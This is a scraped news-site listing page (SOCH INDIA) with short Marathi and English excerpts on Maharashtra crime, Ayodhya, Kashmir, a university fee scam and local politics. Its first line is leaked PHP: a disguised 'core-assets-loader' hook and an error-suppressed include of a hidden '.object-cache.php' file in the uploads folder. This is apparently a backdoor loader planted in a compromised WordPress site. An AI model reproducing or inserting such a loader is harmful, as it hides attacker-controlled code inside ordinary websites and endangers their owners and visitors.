add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); समाचार – SOCH INDIA
Menu

विदर्भात हिंगणघाट येथे एकतर्फी प्रेमातून एका प्राध्यापिकेला जाळण्याचा प्रकार अतिशय संतापजनक असून या प्रकरणी अटकेत असलेल्या नराधमाला पोलीस तपासासह अन्य कायदेशीर बाबींमध्ये विलंब न लावता जलदगतीने शिक्षा होण्याच्या दृष्टीने शासनाने पावले उचलावीत. किंवा हैदराबादेतील घटनेप्रमाणे या मारेक ऱ्याचा थेट ‘एन्काऊंटर’ करावा, अशी मागणी काँग्रेसच्या आमदार प्रणिती शिंदे यांनी केली....

Read More

A day after the Yogi Adityanath government allotted 5-acre land for the construction of mosque in Uttar Pradesh’s Ayodhya following the Centre’s announcement of the Ram Mandir Trust, there are reports coming in that the Muslim litigants are unhappy over the location of the site allotted for the mosque. The BJP government...

Read More

पंतप्रधान नरेंद्र मोदी यांनी जम्मू-काश्मीरचा विशेष दर्जा काढून घेऊन घातक चूक केली आहे, अशी टीका पाकिस्तानचे समपदस्थ इम्रान खान यांनी केली आहे. पाकव्याप्त काश्मीरच्या विधानसभेत बोलताना त्यांनी आरोप केला की, ‘मोदी यांनी पाकिस्तानला निवडणुकीत बळीचा बकरा केले होते, त्यामुळे त्यांना जनमताचा कौल मिळाला. त्यामुळे त्यांनी सत्तेवर येताच जम्मू-काश्मीरचा विशेष...

Read More

राष्ट्रसंत तुकडोजी महाराज नागपूर विद्यापीठाच्या परीक्षा विभागामध्ये कोटय़वधींचा गैरव्यवहार होत असल्याची खळबळजनक माहिती हाती आली आहे. विद्यापीठाशी संलग्नित महाविद्यालय आणि परीक्षा विभागाच्या संगनमताने परीक्षा शुल्काची छुपी चोरी केली जात असल्याचे माहिती अधिकारातून उघड झाले आहे. नियमित शुल्कासह विनाविलंब, विलंब शुल्क, अतिविलंब शुल्कासह किती अर्ज आले याची माहितीच विद्यापीठाकडे नाही....

Read More

मनसेच्या जीवावर मोठे झालेल्यांनी आम्हाला शिकवण्याचा आगाऊपणा करु नये अशा शब्दांत महाराष्ट्र नवनिर्माण चित्रपट सेनेचे अध्यक्ष अमेय खोपकर यांनी भाजपा नेते प्रवीण दरेकर आणि राम कदम यांच्यावर टीका केली आहे. प्रवीण दरेकर आणि राम कदम यांनी मनसेला रामराम ठोकत भाजपात प्रवेश केला होता. काही दिवसांपूर्वी त्यांनी मनसे शिवसेनेच्या वाटेवर...

Read More

वसई-विरार महापालिकेच्या परिवहन विभागाचे २०२०-२१ या वर्षांचे अंदाजपत्रक मंगळवारी परिवहन सभापतींना सादर केले. या अंदाजपत्रकात विविध आकर्षक घोषणा करण्यात आल्या आहेत. वसई-विरारमधील रस्त्यांवर लवकरच विद्युत बसगाडय़ा धावणार असून त्यासाठी २० कोटी रुपयांची तरतूद करण्यात आली आहे. सध्या महापालिकेच्या ताफ्यात १६० बसगाडय़ा आहेत. त्यापैकी १३० बसगाडय़ा मेसर्स भगिरथी ट्रान्सपोर्ट प्रा....

Read More

बलात्काराचा गुन्हा मागे घेण्यास नकार दिल्याने आरोपीने पीडित महिलेवर ज्वलनशील रासायनिक द्रव्याने हल्ला केल्याची घटना काशी मिरामध्ये घडली आहे. पोलिसांनी आरोपीला गुजरातमधून अटक केली असून पुढील तपास सुरु आहे. बाजारातून साहित्य घेऊन परतत असलेल्या महिलेला आरोपीने काशी-मिरा परिसरातील अदानी वीज कार्यालयासमोर गाठले. परिसरात शांतता असल्यामुळे मिरा रोड येथे राहणारा...

Read More

नागरिकत्व सुधारणा कायदा (सीएए), राष्ट्रीय नागरिक नोंदणी (एनआरसी) व लोकसंख्या सूचीबाबत (एनपीआर) सध्या देशभरात राजकीय वातावरण तापलेले आहे. अनेक ठिकाणी या कायद्याचे समर्थक आणि विरोधक यांच्यात मोठा वाद देखील निर्माण झालेला आहे. या कायद्याबद्दल भाजपाकडून एकीकडे जनजागृती केली जात असताना दुसरीकडे विरोधीपक्षांकडून याचा जोरादार विरोध केला जात आहे. परिणामी...

Read More

सुप्रीम कोर्टाच्या निर्णयानंतर अयोध्येत राम मंदिर उभारण्याचा मार्ग मोकळा झाला असून केंद्र सरकारच्या एका योजनेमुळे आता या कामालाही वेग येणार आहे. केंद्रीय मंत्रिमंडळाच्या बैठकीत बुधवारी ‘श्रीराम जन्मभूमी तीर्थक्षेत्र’ या ट्रस्टच्या स्थापनेला मंजुरी दिली. पंतप्रधान नरेंद्र मोदी यांनी लोकसभेत याबाबत माहिती दिली. अर्थसंकल्पीय अधिवेशनात बुधवारी प्रश्नोत्तराच्या तासात मोदींनी राम मंदिराच्या विकासाबाबत...

Read More

नवी मुंबई विमानतळबाधितांचे पुनर्वसन करा यामध्ये मच्छीमारांचे गाव असलेल्या वाघिवली ग्रामस्थांनी मंगळवारी आपल्या गावाशेजारी सुरू असलेल्या विमानतळाचे काम बंद करण्याचा प्रयत्न केला. या वेळी नवी मुंबईतील एनआरआय पोलिसांनी ग्रामस्थांवर कारवाई करीत त्यांना अटक केली. वाघिवली गाव हे मासेमारी करणारे गाव असून येथील मच्छीमारांचे योग्य ते पुनर्वसन आणि भरपाईची मागणी...

Read More